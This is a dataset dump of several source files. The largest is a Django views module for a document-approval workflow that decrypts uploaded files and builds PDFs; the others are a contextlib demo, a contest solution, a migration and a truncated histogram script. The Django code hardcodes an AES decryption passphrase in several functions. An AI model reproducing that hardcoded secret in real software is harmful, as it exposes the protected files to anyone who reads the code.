blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
adbd9301b5bda91c278b06fb2830f00b52df2ea7 | a3c970cb385cb4c6e2122b3c096f61ceb37b3acd | /defence/.history/dashboard/do_views_20191211183052.py | 90e0aa9f0297d160ed8d425b8692c054943d6df7 | [] | no_license | kirubasuba/certa | ec7cd06352ff9c477236afcead89daf9a28943bc | 111f2bdfd2626475951f5f86746f04f5fd42ded4 | refs/heads/master | 2022-12-14T03:44:20.207843 | 2020-05-19T12:36:15 | 2020-05-19T12:36:15 | 212,568,163 | 0 | 0 | null | 2022-11-22T04:41:30 | 2019-10-03T11:56:13 | Python | UTF-8 | Python | false | false | 29,600 | py | from django.shortcuts import render
from django.contrib.auth.decorators import login_required
from django.conf import settings
from django.contrib.auth.models import User,Group
from .forms import UserCreationForm,TAapplicationForm,cemilacUserForm,proforma_A_form,commentsUploadForm
from django.contrib import messages
from common.decorators import role_required
from authmgmt.models import registration
from .models import TAapplicationmodel,proforma_A_model,TAapplicationfiles,statusmodel,commentsmodel,idgenerationmodel
from django.template.loader import get_template
from xhtml2pdf import pisa
from django.http import HttpResponse
from .views import link_callback
import os
from os import stat, remove
import pyAesCrypt
from datetime import datetime
from django.utils import formats
import comtypes.client
import pythoncom
import urllib
from docx import Document
import io
from io import BytesIO,StringIO
# import io.StringIO
from django.core.files import File
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def process_proforma(request):
    """List the TA applications currently routed to the logged-in dealing officer.

    Renders the officer's record view with every application whose
    ``file_in_id`` matches the requesting user's id.
    """
    assigned_records = TAapplicationmodel.objects.filter(
        file_in_id=str(request.user.id)
    )
    context = {'details': assigned_records, 'status': True}
    return render(request, 'dealing officer/viewtyperecord.html', context)
# @login_required(login_url=settings.LOGIN_URL)
# @role_required(allowed_roles=["TA Coordinator"])
# def checklist(request):
# reg=TAapplicationmodel.objects.all()
# return render(request, 'dealing officer/viewtyperecord.html',{'details':reg,'status':True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["TA Applicant","Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def viewtyperecord(request, id):
    """Show the applicant's TAapplication PDF in the in-browser viewer and,
    if a comment was posted alongside it, persist that comment on the file record.

    :param id: user id of the applicant whose application is being viewed.
    NOTE(review): indentation was reconstructed from a whitespace-stripped dump;
    the nesting of the comment-save branch should be confirmed against VCS history.
    """
    print('saiiiiiiiiiiiiiii', id)
    # (A large block of commented-out PDF-generation code was removed here for
    # readability; see VCS history if it is ever needed again.)
    print(id, 'kkk')
    idprefix = request.POST['idprefix']
    filename = request.POST['filename']
    if filename != '':
        # A review comment accompanies this view request.
        comment = request.POST['comment']
        if filename == "TAapplication.pdf":
            # Attach the comment to the stored TAapplication file record.
            tf = TAapplicationfiles.objects.filter(user_id=id, filecategory="TAapplication").first()
            tf.comments = comment
            tf.save()
            # NOTE(review): this queryset is never used — looks like leftover code.
            pro = proforma_A_model.objects.all()
        messages.success(request, 'Comments Successfully Submitted !')
    # Resolve the application and its stored PDF so the viewer template can load it.
    fc = TAapplicationmodel.objects.filter(user_id=id, idprefix=idprefix).first()
    print(fc.idprefix, 'kkk')
    tafil = TAapplicationfiles.objects.filter(user_id=fc.user_id, filecategory="TAapplication", refid=fc.idprefix).first()
    curr_path = "/" + str(fc.user_id) + "/" + fc.idprefix + "Annexure 1/TAapplication/"
    print(tafil, 'tafile')
    filename = 'TAapplication.pdf'
    # URL served by the dev media server; path is percent-encoded for spaces.
    url = 'http://127.0.0.1:8000/media' + urllib.parse.quote(curr_path) + 'TAapplication.pdf'
    print(tafil.comments, 'new')
    return render(request, 'dealing officer/pdf viewer.html', {'url': url, 'id': id, 'filename': filename, 'fc': tafil.comments, 'idprefix': fc.idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def draft_ta(request, id):
    """Produce (or serve) the Draft Type Approval document for applicant *id*.

    Three-stage flow:
      1. If a rendered Draft_TA.pdf already exists, stream it back.
      2. Else if the merged Draft_TA.docx exists, convert it to PDF with MS Word
         via COM and stream the result (Windows-only: comtypes/pythoncom).
      3. Otherwise build the .docx from a template plus the applicant's
         decrypted Annexure 4.13 attachment, then ask the user to click again.

    NOTE(review): `DocxTemplate` is never imported in this module — step 3 will
    raise NameError as written; confirm the intended `from docxtpl import DocxTemplate`.
    NOTE(review): absolute E:/ paths are machine-specific; indentation was
    reconstructed from a whitespace-stripped dump.
    """
    doc_final_path = 'E:/certa-drdo/certa/Draft_TA.docx'
    pdf_final_path = 'E:/certa-drdo/certa/Draft_TA.pdf'
    final_path = 'E:/certa-drdo/certa/'
    if os.path.isfile(pdf_final_path):
        # Stage 1: cached PDF already rendered — serve it directly.
        with open(pdf_final_path, 'rb') as pdf:
            response = HttpResponse(pdf.read(), content_type='application/pdf')
            response['Content-Disposition'] = 'filename=some_file.pdf'
            return response
    elif os.path.isfile(doc_final_path):
        # Stage 2: .docx exists — convert to PDF through Word COM automation.
        print('mmmmmmmmmmmmmm')
        pythoncom.CoInitialize()
        wdFormatPDF = 17  # Word's SaveAs constant for PDF output
        in_file = os.path.abspath(doc_final_path)
        word = comtypes.client.CreateObject('Word.Application')
        doc = word.Documents.Open(in_file)
        doc.SaveAs('E:/certa-drdo/certa/Draft_TA.pdf', FileFormat=wdFormatPDF)
        print('nnnnnnnnnnn')
        doc.Close()
        word.Quit()
        with open(final_path + 'Draft_TA.pdf', 'rb') as pdf:
            response = HttpResponse(pdf.read(), content_type='application/pdf')
            response['Content-Disposition'] = 'filename=some_file.pdf'
            return response
    else:
        # Stage 3: build Draft_TA.docx from the template and the applicant data.
        idprefix = request.POST['idprefix']
        print(idprefix, 'jjjjjjjjjjjj')
        curr_path = "/" + str(id) + "/" + idprefix + "Annexure 7/"
        curr_path = curr_path.replace('/', '\\')
        new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
        taa = TAapplicationmodel.objects.filter(user_id=id).first()
        target_file = StringIO()  # NOTE(review): unused — leftover variable
        template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/template.docx")
        context = {
            'firmname': taa.firmname,
            'addr1': taa.addr1,
            'item_name': taa.item_name,
            'part_no': taa.part_no
        }
        # NOTE(review): docxtpl renders in place; the return value is not a string.
        html = template.render(context)
        doc_io = io.BytesIO()  # NOTE(review): unused — leftover variable
        template.save("Draft_TA.docx")  # written to the process CWD
        new_path1 = 'E:\certa-drdo\certa\Draft_TA.docx'
        output_path = os.path.join(settings.MEDIA_ROOT) + '/89/result.pdf'
        # Decrypt the applicant's Annexure 4.13 attachment next to its source.
        taa = TAapplicationfiles.objects.filter(user_id=id, refid=idprefix, refpath='Annexure 4.13').first()
        aesurl = taa.filepath
        docurl = aesurl[:-4]  # drop the trailing '.aes'
        print('aesview', aesurl)
        print('docurl', docurl)
        bufferSize = 64 * 1024
        passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
        encFileSize = stat(aesurl).st_size
        with open(aesurl, "rb") as fIn:
            with open(docurl, "wb") as fOut:
                pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
        # Append the decrypted document's body onto the rendered template.
        templateDoc1 = Document(new_path1)
        templateDoc = Document(docurl)
        templateDoc1.add_page_break()
        for element in templateDoc.element.body:
            templateDoc1.element.body.append(element)
        templateDoc1.save(new_path1)
        print(request.user.id, 'kkkkkkkk')
        messages.success(request, 'Draft_TA Successfully Prepared, Click again to view the file !')
        reg = TAapplicationmodel.objects.filter(file_in_id=str(request.user.id), file_in_name="TCS-DO")
        print('reggggggg', reg)
        return render(request, 'tcs do/receivedtyperecord.html', {'details': reg, 'status': True})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def data_sheet(request, id):
    """Produce (or serve) the TA Datasheet for applicant *id*.

    Mirrors :func:`draft_ta`: serve a cached PDF, else convert an existing
    .docx via Word COM, else build the .docx from the DS template plus the
    decrypted Annexure 6 attachment and prompt the user to click again.

    NOTE(review): `DocxTemplate` is never imported in this module; absolute
    E:/ paths are machine-specific. Indentation reconstructed from a
    whitespace-stripped dump.
    """
    idprefix = request.POST['idprefix']
    print(idprefix, 'jjjjjjjjjjjj')
    doc_final_path = 'E:/certa-drdo/certa/TA_Datasheet.docx'
    final_path = 'E:/certa-drdo/certa/'
    pdf_final_path = 'E:/certa-drdo/certa/TA_Datasheet.pdf'
    if os.path.isfile(pdf_final_path):
        # Cached PDF already rendered — serve it directly.
        with open(pdf_final_path, 'rb') as pdf:
            response = HttpResponse(pdf.read(), content_type='application/pdf')
            response['Content-Disposition'] = 'filename=some_file.pdf'
            return response
    elif os.path.isfile(doc_final_path):
        # .docx exists — convert to PDF via Word COM automation (Windows-only).
        print('mmmmmmmmmmmmmm')
        pythoncom.CoInitialize()
        wdFormatPDF = 17  # Word's SaveAs constant for PDF output
        in_file = os.path.abspath(doc_final_path)
        word = comtypes.client.CreateObject('Word.Application')
        doc = word.Documents.Open(in_file)
        doc.SaveAs('E:/certa-drdo/certa/TA_Datasheet.pdf', FileFormat=wdFormatPDF)
        print('nnnnnnnnnnn')
        doc.Close()
        word.Quit()
        with open(final_path + 'TA_Datasheet.pdf', 'rb') as pdf:
            response = HttpResponse(pdf.read(), content_type='application/pdf')
            response['Content-Disposition'] = 'filename=some_file.pdf'
            return response
    else:
        # Build TA_Datasheet.docx from the DS template and the applicant data.
        curr_path = "/" + str(id) + "/" + idprefix + "Annexure 6/"
        curr_path = curr_path.replace('/', '\\')
        new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
        taa = TAapplicationmodel.objects.filter(user_id=id).first()
        target_file = StringIO()  # NOTE(review): unused — leftover variable
        template = DocxTemplate("E:/certa-drdo/certa/dashboard/templates/dealing officer/DS template.docx")
        context = {
            'firmname': taa.firmname,
            'addr1': taa.addr1,
            'item_name': taa.item_name,
            'part_no': taa.part_no
        }
        # NOTE(review): docxtpl renders in place; the return value is not a string.
        html = template.render(context)
        doc_io = io.BytesIO()  # NOTE(review): unused — leftover variable
        template.save("TA_Datasheet.docx")  # written to the process CWD
        new_path1 = 'E:\certa-drdo\certa\TA_Datasheet.docx'
        # Decrypt the applicant's Annexure 6 attachment next to its source.
        taa = TAapplicationfiles.objects.filter(user_id=id, refid=idprefix, refpath='Annexure 6').first()
        aesurl = taa.filepath
        docurl = aesurl[:-4]  # drop the trailing '.aes'
        print('aesview', aesurl)
        print('docurl', docurl)
        bufferSize = 64 * 1024
        passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
        encFileSize = stat(aesurl).st_size
        with open(aesurl, "rb") as fIn:
            with open(docurl, "wb") as fOut:
                pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
        # Append the decrypted document's body onto the rendered template.
        templateDoc1 = Document(new_path1)
        templateDoc = Document(docurl)
        for element in templateDoc.element.body:
            templateDoc1.element.body.append(element)
        templateDoc1.save(new_path1)
        messages.success(request, 'Data_sheet Successfully Prepared, Click again to view the file !')
        reg = TAapplicationmodel.objects.filter(file_in_id=str(request.user.id))
        return render(request, 'tcs do/receivedtyperecord.html', {'details': reg, 'status': True})
def _decrypted_media_url(taf):
    """Decrypt one AES-encrypted PDF attachment next to its source file and
    return the dev-server media URL of the decrypted copy.

    Returns '' when there is no file record or the stored file is not a PDF,
    mirroring the original inline handling of DAL_MDI / BOM / Tech_Spec.
    """
    if taf is None or taf.ext != '.pdf':
        return ''
    aesurl = taf.filepath
    pdfurl = aesurl[:-4]  # drop the trailing '.aes' to get the plaintext path
    bufferSize = 64 * 1024
    passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
    encFileSize = stat(aesurl).st_size
    with open(aesurl, "rb") as fIn:
        with open(pdfurl, "wb") as fOut:
            pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
    # NOTE(review): pdfurl[25:] assumes a fixed-length MEDIA_ROOT prefix —
    # fragile; confirm against the actual settings.MEDIA_ROOT length.
    return 'http://127.0.0.1:8000/media' + pdfurl[25:]


@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD","TCS-CE","TCS-Dealing Officer","TCS-TA Coordinator"])
def addproforma(request, id):
    """Serve the Proforma_A for applicant *id*.

    If a generated Proforma_A.pdf already exists on disk, stream it back.
    Otherwise, when a saved proforma record exists, render it (plus decrypted
    DAL_MDI / BOM / Tech_Spec attachment links) to PDF via xhtml2pdf; when it
    does not, show the blank proforma entry form.

    Refactor note: the three identical decrypt-and-URL blocks were extracted
    into :func:`_decrypted_media_url`; behavior is unchanged.
    """
    idprefix = request.POST['idprefix']
    fc = TAapplicationmodel.objects.filter(user_id=id, idprefix=idprefix).first()
    curr_path = "/" + str(fc.user_id) + fc.idprefix + "Annexure 3/Proforma_A/"
    curr_path = curr_path.replace('/', '\\')
    new_path = os.path.join(settings.MEDIA_ROOT + curr_path)
    if os.path.isdir(new_path):
        # Already generated — stream the stored PDF.
        with open(new_path + 'Proforma_A.pdf', 'rb') as pdf:
            response = HttpResponse(pdf.read(), content_type='application/pdf')
            response['Content-Disposition'] = 'filename=some_file.pdf'
            return response
    else:
        form = proforma_A_form(request=fc.user_id, idpre=fc.idprefix)
        pro = proforma_A_model.objects.filter(user_id=fc.user_id, idprefix=idprefix).first()
        taa = TAapplicationmodel.objects.filter(user_id=fc.user_id, idprefix=idprefix).first()
        if pro:
            # A saved proforma exists — render it to PDF.
            template = get_template('dealing officer/proformapdf.html')
            formatted_datetime = datetime.now().strftime("%Y-%m-%d")
            dalurl = _decrypted_media_url(
                TAapplicationfiles.objects.filter(
                    user_id=fc.user_id, filecategory='DAL_MDI', refid=fc.idprefix).first())
            bomurl = _decrypted_media_url(
                TAapplicationfiles.objects.filter(
                    user_id=fc.user_id, filecategory='BOM', refid=fc.idprefix).first())
            techspecurl = _decrypted_media_url(
                TAapplicationfiles.objects.filter(
                    user_id=fc.user_id, filecategory='Tech_Spec', refid=fc.idprefix).first())
            context = {
                'firmname': taa.firmname,
                'addr1': taa.addr1,
                'addr2': taa.addr2,
                'item_name': taa.item_name,
                'part_no': taa.part_no,
                'desc': taa.desc,
                'dal_mdi': taa.dal_mdi,
                'bom': taa.bom,
                'sop_acbs': taa.sop_acbs,
                'tre': taa.tre,
                'otheritems': taa.otheritems,
                'dalurl': dalurl,
                'bomurl': bomurl,
                'techspecurl': techspecurl,
                'ta': pro.ta,
                'techspec': pro.techspec,
                'qts': pro.qts,
                'qtr': pro.qtr,
                'cd': pro.cd,
                'photo': pro.photo,
                'feedback': pro.feedback,
                'req': pro.req,
                'cost': pro.cost,
                'quantity': pro.quantity,
                # The original dict listed 'pc' twice (taa.pc then pro.pc);
                # the later pro.pc won, so only it is kept here.
                'pc': pro.pc,
                'tacomments': pro.tacomments,
                'datenow': formatted_datetime
            }
            response = HttpResponse(content_type='application/pdf')
            response['Content-Disposition'] = 'attachment; filename="report.pdf"'
            html = template.render(context)
            pisaStatus = pisa.CreatePDF(
                html, dest=response, link_callback=link_callback)
            if pisaStatus:
                return HttpResponse(response, content_type='application/pdf')
            if pisaStatus.err:
                return HttpResponse('We had some errors <pre>' + html + '</pre>')
            return response
        else:
            print(form.errors)
        # No saved proforma yet — show the blank entry form.
        return render(request, 'dealing officer/proforma.html', {'form': form, 'id': id, 'idprefix': idprefix})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer"])
def generateproformapdf(request):
    """Persist a submitted Proforma_A form and advance the application's
    workflow status to 'Ready_for_CL'.

    Reads the applicant id and id prefix from POST, binds the proforma form,
    saves it against the applicant's user record, then timestamps the status
    row before re-rendering the proforma page.

    NOTE(review): when the form is invalid (or on a non-POST request) the
    function falls off the end and returns None, which Django rejects —
    confirm whether a re-render of the form was intended there.
    NOTE(review): indentation reconstructed from a whitespace-stripped dump;
    `tafil` is fetched but never used.
    """
    id = request.POST['id']
    idprefix = request.POST['idprefix']
    print('saiiiiiiiiiiiiiii', id)
    fc = TAapplicationmodel.objects.filter(user_id=id, idprefix=idprefix).first()
    print(fc.idprefix, 'kkk')
    tafil = TAapplicationfiles.objects.filter(user_id=fc.user_id, filecategory="TAapplication", refid=fc.idprefix).first()
    if request.method == 'POST':
        user = User.objects.get(pk=fc.user_id)
        form = proforma_A_form(request.POST, request=fc.user_id, idpre=fc.idprefix)
        if form.is_valid():
            # Attach the proforma to the applicant before saving.
            pro = form.save(commit=False)
            pro.user = user
            pro.idprefix = fc.idprefix
            pro.save()
            # Move the application's workflow status to Ready_for_CL.
            taapp_form = TAapplicationmodel.objects.filter(user_id=pro.user_id, idprefix=fc.idprefix).first()
            print("pro_form", taapp_form.id)
            get_taap_id = statusmodel.objects.filter(TAA_id=taapp_form.id).first()
            get_taap_id.status = 'Ready_for_CL'
            get_taap_id.Ready_for_CL = datetime.now()
            get_taap_id.save()
            print("status", get_taap_id)
            messages.success(request, 'Proforma_A Successfully Prepared !')
            return render(request, 'dealing officer/proforma.html')
            # (A large block of commented-out PDF-generation code was removed
            # here for readability; see VCS history if ever needed again.)
        else:
            print(form.errors)
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def rowselect(request, id):
    """Build the per-annexure comments listing for one application and render
    the reviewer comments page.

    For every distinct annexure path on file for (user *id*, POSTed idprefix),
    a comments row is created, then all comment rows for that application are
    shown.

    NOTE(review): a new commentsmodel row is inserted on *every* call, so
    repeated visits create duplicates — confirm whether get_or_create was
    intended. `taf`/`idg` are fetched but unused; `comments.save()` returns
    None, so `commentsdb` is always None.
    """
    form = commentsUploadForm
    print('if', id)
    idprefix = request.POST['idprefix']
    print(idprefix, 'idprefix')
    taf = TAapplicationfiles.objects.filter(user_id=id, refid=idprefix).order_by('refpath').first()
    get_refpath = TAapplicationfiles.objects.filter(user_id=id, refid=idprefix).values('refpath').order_by('refpath')
    idg = idgenerationmodel.objects.filter(user_id=id, idprefix=idprefix).first()
    print(get_refpath, 'taff')
    for anex_name in get_refpath:
        anexture_name = anex_name['refpath']
        print(anexture_name, 'taff')
        # One comments row per annexure path.
        comments = commentsmodel(name=anexture_name, idprefix=idprefix, user_id=id)
        commentsdb = comments.save()
    Datadisp = commentsmodel.objects.filter(user_id=id, idprefix=idprefix).order_by('name')
    print(Datadisp, 'Datadisp')
    return render(request, 'rd/comments_view_doc.html', {'form': form, 'details': Datadisp})
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def addcomment(request):
    """Accept a review comment posted for an annexure and re-render the
    comments page.

    NOTE(review): the persistence block is currently commented out, so the
    submitted values are read and logged but never stored.
    """
    posted = request.POST
    annexure = posted['name']
    comment_text = posted['comments']
    owner = posted['responsible']
    state = posted['status']
    prefix = posted['idprefix']
    print(prefix, annexure, 'idprefix')
    print(comment_text, owner, state, 'details')
    reviewer_role = request.role
    stamped = datetime.now()
    today = stamped.strftime("%Y-%m-%d")
    # Persistence intentionally disabled (kept for reference):
    # row = commentsmodel.objects.filter(name=annexure, idprefix=prefix).first()
    # row.comments = comment_text
    # row.commented_date = today
    # row.commented_by = reviewer_role
    # row.save()
    return render(request, 'rd/comments_view_doc.html')
@login_required(login_url=settings.LOGIN_URL)
@role_required(allowed_roles=["Dealing Officer","TA Coordinator","RD","TCS-GD"])
def pdfviewercopy(request, id):
    """Decrypt a selected attachment for applicant *id* and render it in the
    detail-view page.

    POST carries the encrypted file's path and extension. PDFs are decrypted
    in place; .docx files are decrypted then converted to PDF through MS Word
    COM automation (Windows-only) before viewing.

    NOTE(review): the extension is compared as '.pdf' but 'docx' (no dot) —
    confirm the values stored in TAapplicationfiles.ext. If the extension
    matches neither branch on a POST, the function returns None.
    NOTE(review): pdfurl[25:] assumes a fixed-length MEDIA_ROOT prefix;
    indentation reconstructed from a whitespace-stripped dump.
    """
    taa = TAapplicationmodel.objects.filter(user_id=id).first()
    taf = TAapplicationfiles.objects.filter(user_id=id).exclude(filecategory="TAapplication")
    print('kkkkkkkkkkkkkkkkk')
    if request.POST:
        aesurl = request.POST['path']
        ext = request.POST['ext']
        tafnew = TAapplicationfiles.objects.filter(user_id=id, filepath=aesurl, ext=ext).first()
        fc = tafnew.comments
        print('aesview', aesurl)
        pdfurl = ''
        docurl = ''
        nameonly = ''
        if ext == '.pdf':
            # Decrypt the .aes file to a sibling .pdf and serve its media URL.
            pdfurl = aesurl[:-3] + 'pdf'
            print('aesview', aesurl)
            print('pdfview', pdfurl)
            bufferSize = 64 * 1024
            passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
            encFileSize = stat(aesurl).st_size
            with open(aesurl, "rb") as fIn:
                with open(pdfurl, "wb") as fOut:
                    pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
            print(pdfurl, 'pdfurl')
            pdfpath = pdfurl[25:]
            print(pdfpath)
            curr_path = pdfpath
            url = 'http://127.0.0.1:8000/media' + curr_path
            print(fc, 'comments')
            return render(request, 'dealing officer/detail view.html', {'url': url, 'id': id, 'fc': fc, 'taa': taa, 'taf': taf, 'path': aesurl})
        elif ext == 'docx':
            # Decrypt the .aes to .docx, then convert to PDF via Word COM.
            nameonly = aesurl[:-4]
            docurl = aesurl[:-4] + '.docx'
            print('aesview', aesurl)
            print('nameonly', nameonly)
            print('docurl', docurl)
            bufferSize = 64 * 1024
            passw = "#EX\xc8\xd5\xbfI{\xa2$\x05(\xd5\x18\xbf\xc0\x85)\x10nc\x94\x02)j\xdf\xcb\xc4\x94\x9d(\x9e"
            encFileSize = stat(aesurl).st_size
            with open(aesurl, "rb") as fIn:
                with open(docurl, "wb") as fOut:
                    pyAesCrypt.decryptStream(fIn, fOut, passw, bufferSize, encFileSize)
            pythoncom.CoInitialize()
            wdFormatPDF = 17  # Word's SaveAs constant for PDF output
            in_file = os.path.abspath(docurl)
            word = comtypes.client.CreateObject('Word.Application')
            doc = word.Documents.Open(in_file)
            doc.SaveAs(nameonly + '.pdf', FileFormat=wdFormatPDF)
            doc.Close()
            word.Quit()
            pdfurl = nameonly + '.pdf'
            print(pdfurl, 'pdfurl')
            pdfpath = pdfurl[25:]
            print(pdfpath)
            curr_path = pdfpath
            url = 'http://127.0.0.1:8000/media' + curr_path
            print(fc, 'comments')
            # Clean up the intermediate decrypted .docx (the PDF is kept).
            os.remove(docurl)
            return render(request, 'dealing officer/detail view.html', {'url': url, 'id': id, 'fc': fc, 'taa': taa, 'taf': taf, 'path': aesurl})
    else:
        # Plain GET: show the detail view without a selected document.
        return render(request, 'dealing officer/detail view.html', {'id': id, 'taa': taa, 'taf': taf})
| [
"30341216+kirubasuba@users.noreply.github.com"
] | 30341216+kirubasuba@users.noreply.github.com |
b03de72493e2c78c1000ad28f82b270dba2b5ebb | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /Others/soundhound/soundhound2018-summer-qual/c.py | b42363ae9f79c07d25224a6872610f1bc11e50c0 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 797 | py | # -*- coding: utf-8 -*-
def main():
    """Expected number of adjacent pairs (out of m - 1) whose two independent
    uniform picks from 1..n differ by exactly d.

    By linearity of expectation the answer is (m - 1) times the probability
    that a single pair of uniform picks (a, b) satisfies |a - b| == d.
    """
    n, m, d = map(int, input().split())
    adjacent_pairs = m - 1
    if d == 0:
        # Exactly the n pairs (1,1)..(n,n) match, out of n^2 combinations.
        expectation = adjacent_pairs / n
    else:
        # Ordered pairs at distance d: (1, d+1)..(n-d, n) and the mirrored
        # set, i.e. 2 * (n - d) of the n^2 combinations.
        expectation = adjacent_pairs * (2 * (n - d)) / n ** 2
    print(expectation)


if __name__ == '__main__':
    main()
| [
"k.hiro1818@gmail.com"
] | k.hiro1818@gmail.com |
579b09ba8c6ea43f5b254fc7bfcff355538a029b | aa369073fab4f8e13ac27a714fe0d975a5a4a9ed | /algorithms/contextlib/contextlib_decorator.py | e31081404750566ee6b97aecadeb90d4fa43ebe0 | [] | no_license | ramsayleung/python3-module-of-week | 4076599a8b1d8aa5794de5d73e2083555abe9f0c | 54266c7e62025c3816a6987191c40f3bc0fdd97c | refs/heads/master | 2021-06-18T09:07:30.256614 | 2017-06-25T10:14:54 | 2017-06-25T10:14:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 583 | py | import contextlib
class Context(contextlib.ContextDecorator):
    """Demo context manager usable both with `with` and as a decorator.

    Each lifecycle hook prints a trace line tagged with how the instance
    is being used, so the example's output shows when __init__, __enter__,
    and __exit__ fire.
    """

    def __init__(self, how_used):
        # Remember the usage label for the trace output.
        self.how_used = how_used
        print('__init__({})'.format(how_used))

    def __enter__(self):
        print('__enter__({})'.format(self.how_used))
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        # Implicitly returns None (falsy): exceptions propagate normally.
        print('__exit__({})'.format(self.how_used))
# ContextDecorator lets the same class wrap a function: every call to
# func() runs inside a fresh enter/exit cycle.
@Context('as decorator')
def func(message):
    print(message)


print()
# Usage 1: as an ordinary context manager around a block.
with Context('as context manager'):
    print('Doing work in the context')

print()
# Usage 2: as a decorator — enter/exit fire around the wrapped call.
func('Doing work in the wrapped function')
| [
"samrayleung@gmail.com"
] | samrayleung@gmail.com |
234dd1f7bc842aa839543c69dc1229e4cbfc4ef0 | 299e2c985b4a2921b150579955e7c60eee094397 | /news/migrations/0006_auto_20190628_1447.py | 9bd54a81c13dcf49ebf7819d2ee21928410fb2e4 | [
"MIT"
] | permissive | Nigar-mr/News | 48d58fbaab0f2bb8cc717323449d7eba14b94918 | b75b78cc9fa64259f4239b1d456daa5224040ce4 | refs/heads/master | 2020-06-17T15:20:05.411391 | 2019-07-09T08:21:24 | 2019-07-09T08:21:24 | 195,961,863 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 407 | py | # Generated by Django 2.2.2 on 2019-06-28 10:47
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2.2: changes the upload destination of
    # HeaderModel.image to 'news/icons/'.

    dependencies = [
        ('news', '0005_remove_headermodel_dropdown'),
    ]

    operations = [
        migrations.AlterField(
            model_name='headermodel',
            name='image',
            field=models.ImageField(upload_to='news/icons/'),
        ),
    ]
| [
"nigar-muradli@mail.ru"
] | nigar-muradli@mail.ru |
da9e63f387cfd9e65de7a3e1a42fee0f4b8d78ad | 2ac5a81d48809c8dcfcadd76cdbc47db0849758a | /benchmark/wikipedia/annotate_image.py | 969cd898afdb5268c411c46595167cb0a8175e81 | [] | no_license | vmingchen/mris | 5fbed336c2b37dcbe79ee3cc50197bc26d4b2ffc | dacb37238e95b4474ba40112a09fb62f3c45723a | refs/heads/master | 2020-04-15T05:08:37.982307 | 2013-03-03T23:11:03 | 2013-03-03T23:11:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | #!/usr/bin/python
'''
Calculate statistics of file sizes (logarithmic).
'''
import sys
import math
import get_hist
if __name__=="__main__":
    # Python 2 script: aggregate a "<size> <freq>" histogram file into
    # logarithmic (power-of-two) size buckets and print one bucket per line.
    if len(sys.argv) != 2:
        print "usage: %s infile" % sys.argv[0]
        sys.exit(1)
    hist = {}
    for line in open(sys.argv[1]):
        # Skip comment lines; each data line is "<size> <freq>".
        if line[0] == "#":
            continue
        (size, freq) = line.split()
        size = float(size)
        if size <= 0:
            # log2 undefined for non-positive sizes.
            continue
        # Bucket index = floor(log2(size)); accumulate frequencies per bucket.
        level = int(math.log(size, 2))
        if level in hist:
            hist[level] += int(freq);
        else:
            hist[level] = int(freq)
    # Human-readable label per bucket, starting at 512 bytes and doubling.
